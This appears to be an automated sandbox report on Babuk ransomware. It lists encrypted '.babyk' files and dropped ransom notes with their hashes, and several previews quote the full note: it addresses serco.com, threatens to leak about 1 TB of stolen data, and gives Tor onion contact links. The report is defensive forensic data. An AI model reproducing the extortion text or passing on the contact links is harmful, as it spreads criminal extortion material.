                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):188
                                                                            Entropy (8bit):6.689232219262426
                                                                            Encrypted:false
                                                                            SSDEEP:3:Jq0xqKDLP5uLXqJ3ryIy1BmjaArxP5cI9IBU+6qxTtSQL0VqA2W9UxNvEEn:JPxqceXC9HuC3jIWzg/LNAB90vtn
                                                                            MD5:E974E74F896B663566EF65E3F4AEF0D2
                                                                            SHA1:064871D8474517FB8CCD806C7B47579F13A63119
                                                                            SHA-256:45DF8152D631DFDA734BAF8226311882849E293AD3C1C13723E9E427AC789E76
                                                                            SHA-512:619320EBDB646E71049AEC5BD43BEFE1AC6649EA6A4542DB81538EE381686E2C474DADEBBC469C2ECAB9B4AFE7BC74010C7AB79F88FD71F7813660EBD23DDAEB
                                                                            Malicious:false
                                                                            Preview: .?n..w...Do......0....../........R.Nw..\..(...)..$.....>e......-...w..X..011.}.&*v..G.....3$./^.......&H..%...7..k.j./..rr1..`8..,...n...Q..f.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Vault\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Contacts\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8327314151039475
                                                                            Encrypted:false
                                                                            SSDEEP:24:X9pZ9dBx8qgOSjGTwR6Bn05ocG0WW5RxmBggfE84cZVO2Hozm:fZ9dBx8qYjc65obWLxmB48ZVO2Hozm
                                                                            MD5:2BD75428A725E13745204BB20C83D262
                                                                            SHA1:9C56D78F8BA31D2923243D561936AE94688FB00D
                                                                            SHA-256:A5935CB1EF22D04D5BDAF4A3517097649C2F383B30A3B727822DED8829FFDC19
                                                                            SHA-512:16071056F0C48CAFC1B6C88F161540360AF68E2BAE5F4DF20D4CB864DC587F327588D583951481CC94A2FB24934EC7B0D76C4115FCB29BC4A2E09D3C5749B26C
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\CURQNKVOIX.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8335346455953125
                                                                            Encrypted:false
                                                                            SSDEEP:24:wwUVxLgmN4Nk7BiNLofAjIT2Q8aBkCtPobbgYiwg2Ka:ggzMBiVoiIT2uebp9g4
                                                                            MD5:ABC645DA2B1CF85E74C985B6836DEB4C
                                                                            SHA1:176B7EA2E70FD03E3101CCB7513DF24AD1F03523
                                                                            SHA-256:855F0C3525F341C9F0237B69E1FBFB73AEA08FF61E2125651CB96E8A1FC3D913
                                                                            SHA-512:28EC0FC95F6DCD1683991E287E94C15AE666DD1EBC0261637BE1F6197B4DE3F480414824BFAF581D37E1471991BB809419A1E0C75471A33A111DED0B310F1AE3
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\CURQNKVOIX\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\Excel 2016.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2828
                                                                            Entropy (8bit):7.92600045278126
                                                                            Encrypted:false
                                                                            SSDEEP:48:myDAVocJkVRrlihbB7DJj3xc4waJhVX++eiEAi9/BjcMz+/7LTTCb5rM3+x2eze7:myD4TJk3rlmFDvbJhVX+tigmMi/7HTC0
                                                                            MD5:28B9D742860FB70CEBD2BE3A8422BA10
                                                                            SHA1:52CB7AF7CC32C4BBE1E8771019444D04EBECBFC9
                                                                            SHA-256:ABC9CC94EEB815B977F65E45B32220070AEFDF2D7806B365FBE9AC559C2F32AC
                                                                            SHA-512:C8BF6956A0D40378B5157E963913D814145699E4EA879F19D531BB612F3BA300B3D8C7A2B9C843059D05E857DEAE07157464F972087CA2DFE3E861A208DBC7E7
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.776904436735407
                                                                            Encrypted:false
                                                                            SSDEEP:24:6eqPn/gycgh96qsIbmdNi7jg/StM7mSRazhGJmSuqu7QMxO3aYm5ZYphD4Hw:6pPnDdCIEY7jgKtMBRQhGCqu8MWcgd4Q
                                                                            MD5:EDE64D8BB0267AA3D0C8AF7B9C334E87
                                                                            SHA1:89035AFF57A7D5CB037191E36742B3DF12E055E5
                                                                            SHA-256:F6446F989944A358EE6B37FCB753F4E8724517D880566ED85DA35FD7F0D7A25F
                                                                            SHA-512:362FF8BB8DE426AB035868F1A9BBC6DE16FD1FD17AACF2541DCA3906C77047ECF2ED57F6972D8BFBB7C60BA663F4737EC066FB441117FBF0332E1D5328B1030E
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\FENIVHOIKN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.836840719095412
                                                                            Encrypted:false
                                                                            SSDEEP:24:7SqdQecFyStbEgFMOGDSMhoI20WW8nTxPiYnSagTycL80:OqdjcFy3gFM9fHyTJxjwN80
                                                                            MD5:32FDCB0549893A408314A43055493139
                                                                            SHA1:87572C5152FA10DE18AFC258540D32BAF8E65830
                                                                            SHA-256:BEFEE27F78EF926A13873659B22F2AF1B6BBFB8E00860B78E8D72CCBDAEFB8B4
                                                                            SHA-512:5D0515BC39EFA301332083273FCB7C30C738E4B9681E0FF3D3BDFF7FDF174C95E33390EFB722C72BB1EAEDB40B491FD6A0793319A09E6E0743773D35451E0136
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\IPKGELNTQY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.827760283499267
                                                                            Encrypted:false
                                                                            SSDEEP:24:iq9yn/UviIyjhhbYQVr8vW8VXGI0xaGkaERdL9T+FZxIQztowMq:1USihHMJV2I0tkj7YHDowz
                                                                            MD5:4CBCFD5666F7BBD6840D4893AF3A6F7C
                                                                            SHA1:59631295599A5B2BA25CB5D55E378A80D265BDCC
                                                                            SHA-256:031A0213E0861811AADE223931D6157CE8FD00A05C50FADEB398F0A65F7D9189
                                                                            SHA-512:87EBA39D78B3D6352D9D46508FA318B72EBD0A708DBD2950CC1D2FDCDC6F716E39B2AA63C9B0B90D5BD6D5E11DF50FD5343BE4D7F1467D41A5AFFC1C99E66C6E
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.859989296638824
                                                                            Encrypted:false
                                                                            SSDEEP:24:SyiAj5PJUl+dkBfyj9N2I2RwZ4VRAGWq1caLAHTWnswk8t4HF:5t2Bfyj9BZ4VRAFecaATgj4HF
                                                                            MD5:3EB598406E8CEE443D0BDD374FB46894
                                                                            SHA1:5D6A87AD01A754D56161452CCAB731731B0B8705
                                                                            SHA-256:5625DD2541FB8FE21717333B19503CBED254AAD8C9BA73DC8FBEAC285183E8B9
                                                                            SHA-512:4D4DD5507520B58D007F19725227F0B8A4B3B6D63CD95A947837C2BD364EB50B316DB777ACF41444FC479C3423F0F6B40084AA5B58106A70CB050F209EA5CA05
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\CURQNKVOIX.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8257216355769
                                                                            Encrypted:false
                                                                            SSDEEP:24:hFzBjJHe1AULdRZ+mWr02hqk2NxTJHs1bQ/B5f2P4LYdx:hD9H8AULd/nEbL2NxTp3FPLcx
                                                                            MD5:204CC32756D2DA16BC0349001D3C6F29
                                                                            SHA1:871BBE5807D9FB0B56DF76DAF911107AC528DD97
                                                                            SHA-256:4B4A6E10783503EA6877E2D843ACD361AA88C040A714ADED5C5E8FFA568FB17E
                                                                            SHA-512:56DDCD58260F0A68BE385CA8AA08DB2BCFB5B44E839C3D53F4FFF446233B4953AC32C256A87E449C9F4A640CE9848C84E6523C1FCFF89A36B69E9616F6E392ED
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\JSDNGYCOWY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.805570173522477
                                                                            Encrypted:false
                                                                            SSDEEP:24:/FOiS03wDysnrTDAbbuAkhOy9AurWsme1T5nYHdH1YXnzMZXWnywhVEhY:wSs5DAbfoOijwVYoVgyQVsY
                                                                            MD5:EC683215A882B43C6F4A52FD71F18677
                                                                            SHA1:DFF82A5F057C42AB9178B9C05A8B8F6106FD956C
                                                                            SHA-256:E7E02751D46F99C6DA8893E62886BED1B9985C5829F0A241660F56039C8E3E46
                                                                            SHA-512:DF9EAA89877AF7BEA46397A68B54C91AFBC27F2F8471F83FB54FADDCCFC4B8842FA6C77AE5A664829A7F3274AF3C49AEDC1684B7A5BC873592F32619769F7642
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\NIKHQAIQAU.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.803851003064965
                                                                            Encrypted:false
                                                                            SSDEEP:24:XBSm1WMVGNYJ0nB92dZwl0fPDLV0p3t+tAWa/CnwbL1V:XBLGDzlQ+pd++IiL1V
                                                                            MD5:AB4FE0E219CF74793CA583875004208F
                                                                            SHA1:58EA4B13E800E889ED15134084BA12A64EB6C054
                                                                            SHA-256:0A178A3FF577BE5895BB2F69EEE6972605C9C722FEA95A1903490AE99A02E47B
                                                                            SHA-512:87CB8605ECAA2B6A9FE54F08B027B8DAECEF6DBC475D08A16AC3722F6FCCB659029E8ED74B4787EC987B211E8D718E863C9F6CC3392DED8D97EE5D8F08523C6E
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\RAYHIWGKDI.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820240589132334
                                                                            Encrypted:false
                                                                            SSDEEP:24:Cc3a9+J1XcMk3xh4MditGv0IPRjupOaKHHNOxPdHM:COaMdcMCxh44lPkODNOPM
                                                                            MD5:FEDF6C4ECCAF249A894E53B6D10A2744
                                                                            SHA1:F806139E41378EBC1B669BDE74A1E7FBFE4D0E38
                                                                            SHA-256:C260EB57158AAF96082EADCC2E6C54DCECD8724BF22FC167A2634A974B71835D
                                                                            SHA-512:DE2AEE7F5EE688CA485D113DE71261DDA2F013959852DB875D48F7AB08144AA065D6CF6005A29CF59CC9EFE47B10054E02D5989599B881EFDD3E3BB7F1875EB3
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\SQRKHNBNYN.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8347562464384835
                                                                            Encrypted:false
                                                                            SSDEEP:24:zkQwX1avKjcvY9ZFAcx2zQCX9KS1rQKt+uqReoDdbW6DLXIYs:YQEkvKjNZIzHc9Kt+uqRewbW6D8
                                                                            MD5:A25E5C7B2F4F69F641B589B28A902DA4
                                                                            SHA1:AD35A421DA5B64DE76C238C1978CE62A09A21044
                                                                            SHA-256:B9B9625E8D0A636C521E3750F5F10B322D439632AA163A5BD12479AABF936C3A
                                                                            SHA-512:FACB048A5AABFCDAFA57CA73B8B8534B02E2A3F1BC8DD044396E6AA09080AF0CDF5E819BAE6A66491F2CB265E54F9421FD8F332F8F2AB47F763963044FA1DBF7
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\ZTGJILHXQB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.817495710333979
                                                                            Encrypted:false
                                                                            SSDEEP:24:R1X8c9grN5AU4aco/TKJVQqpcg49rd5pa+6SJHc2FbOexleOvHAlKL:R1X8cCR5Azm/UoFNJHXF/zHAlK
                                                                            MD5:E73C780A80DF3352BD1F766A89E419AB
                                                                            SHA1:5099A04067D18029CABE1E9908FE61A4D64AD416
                                                                            SHA-256:816DF22650302DC5D7EE1E1CC50C3669802331C24A738DAB00349F6FEFE161A9
                                                                            SHA-512:8A50A097C8979FAE9845E024EABFFF82311B9BE22EB3A53074ECF2593720926BE5C0D28F86B16000E48444CB7B3D99B109D7FC844E81340314AED3F13ED3B755
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.82694271727931
                                                                            Encrypted:false
                                                                            SSDEEP:24:OaCf0JiuoY02jo0DqeXvaMP02vYq2s1CCKidkeoOc/sDoICNUua2Wp/5nJq0hY:3K0JiuEkDqefaMgvcCsdXcsDoI2U/2yy
                                                                            MD5:398728956B62DE8D7BCDF87926850A47
                                                                            SHA1:668B58790D22DC6D3CF0A2387F320C6782D7B383
                                                                            SHA-256:0F84A1FDED9AE07698C9C980DAD57D7605F7C350595ABFED087A73792ECEDA92
                                                                            SHA-512:BB62378740A2B4B8A8FC8C18F3B5688D3D008BA34A4F947AEC84E9DD6CC5A9E0B6CEE048841E72D5EFD5302A843BE586E20CD2503C95CE1FFAD4AFCDF594C507
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.821043563817252
                                                                            Encrypted:false
                                                                            SSDEEP:24:N7f7RimK9CpEWGIr3tUDzcHmV4z9LILGUcK9Je+Adt6BSGhs:N7f7RG9AXym24zhqGUcK9s+ctcU
                                                                            MD5:AD6A0EAFDC7038C82BF020FB7D3D6550
                                                                            SHA1:227A1050CCFEBD8C6EC5DFAEEED62F333623ABF7
                                                                            SHA-256:88DABF3DAC1BFBA6E4604B13DE37E642DDBBFDB38A5CABE1B59F33AC6C842FCC
                                                                            SHA-512:ADF56FCB991A233CA032CBCACE454DA9CBA1F2528BE55ADD08FAABC5C096F8DEE8802B249A2FC1B9B872CBF9E365D489A658F89BD519253F1790B9613886F45A
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.819333286252541
                                                                            Encrypted:false
                                                                            SSDEEP:24:n61y1bDG5ntezV4yA0fYkBbg1460X9XYwUj2dD0gPUtCoQ:n6EhDGCzc0Vbg1D0X9IF2D0KIK
                                                                            MD5:F7F2E4F19248FBB082341D9129F91D75
                                                                            SHA1:2CE0D47934F89E34B22CFA83A3DBEB4F5E65DC13
                                                                            SHA-256:60CC1F3D2E0FBE0D3249A051D522C92C9AE99725BDEA28C38D356F5D23B42FE8
                                                                            SHA-512:7C494127CEE07BC59C633E1BFC8B8684F856D6E0E414ADDF44920764A137AD916FC2E83D060D479336B20F258BB96680C1278F36FF26B1DA9F66BEC3C8587CF1
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.837123793668199
                                                                            Encrypted:false
                                                                            SSDEEP:24:YGWHOZcD0Nj8tIRxkjgHeppsQPlWffvGYe2Wi3R:YlkJYtI31afdWffv/3h
                                                                            MD5:3DC1349BB5E838C70D219F8C51ED8F4C
                                                                            SHA1:ECE54F983AFBEEEB0BCDCAE068BF8C76F878ECFF
                                                                            SHA-256:F707C4ED789D22A004A9E62B0FBD9DC2F1485F7DA13ABA589F9F19830F8C8298
                                                                            SHA-512:0488B21A4704E10E6E9401ADEFFC655B2D04F547E348FDC3021E270A57CDC90B24D6FE136FEF49FBF8982F38ED362EC9B92765E4203B4D35119588B8EF9C7A0A
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.850266700276233
                                                                            Encrypted:false
                                                                            SSDEEP:24:dmdso9dT7SWEg1iWP3gBwlkuWE4HryLNGLcHIw8AUB2cIm4bGGLnOnJfHOsfQl:kdso9NltgG21BrqEcow8x0K4SQnqNZO
                                                                            MD5:1BD90AE33B72AC9DE1DC4899446310E5
                                                                            SHA1:E847908FA48DEA91F60BCBEF27A564012946D17D
                                                                            SHA-256:BF8CEBFF5F3A5849BC9BEA67DA0E6FFD18985843A8064BE205DADFDA89D6BCB4
                                                                            SHA-512:AFDE866023AA07E69143808FF463B536D55899B2E24B207B3EFD6FE3BD575A9330EBB7129E91C28CB41B7288F1ED4B0B14C711F2E7D3C36774A69B7960AFB8A8
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.835186168765143
                                                                            Encrypted:false
                                                                            SSDEEP:24:RHnbYVWcKL6o5odHyHYOEKxHyAzeEu03e8xGeVtPvftNfOJ4IN7X/8L:VnbYVWcKWo5odHyHxEKxSWeN0O8fps4V
                                                                            MD5:E1887E656A44B6C0A8B71306BD8A4ECB
                                                                            SHA1:D9928DA641A6EDDF71F46023D14D1FD8912C3BAA
                                                                            SHA-256:2B8B1BE852BC5DB84A5C319FAD772617DC609B728866EFFCC74C8A51CAE5CC62
                                                                            SHA-512:A4C1E75C022E6B0B507C403F4E5D77DA03204A7B809764BD7E7524B7F4BEC5AC71B380070AB395E5BB5337137CD0359D4FD233829C205E782A70011BFA63DC1D
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
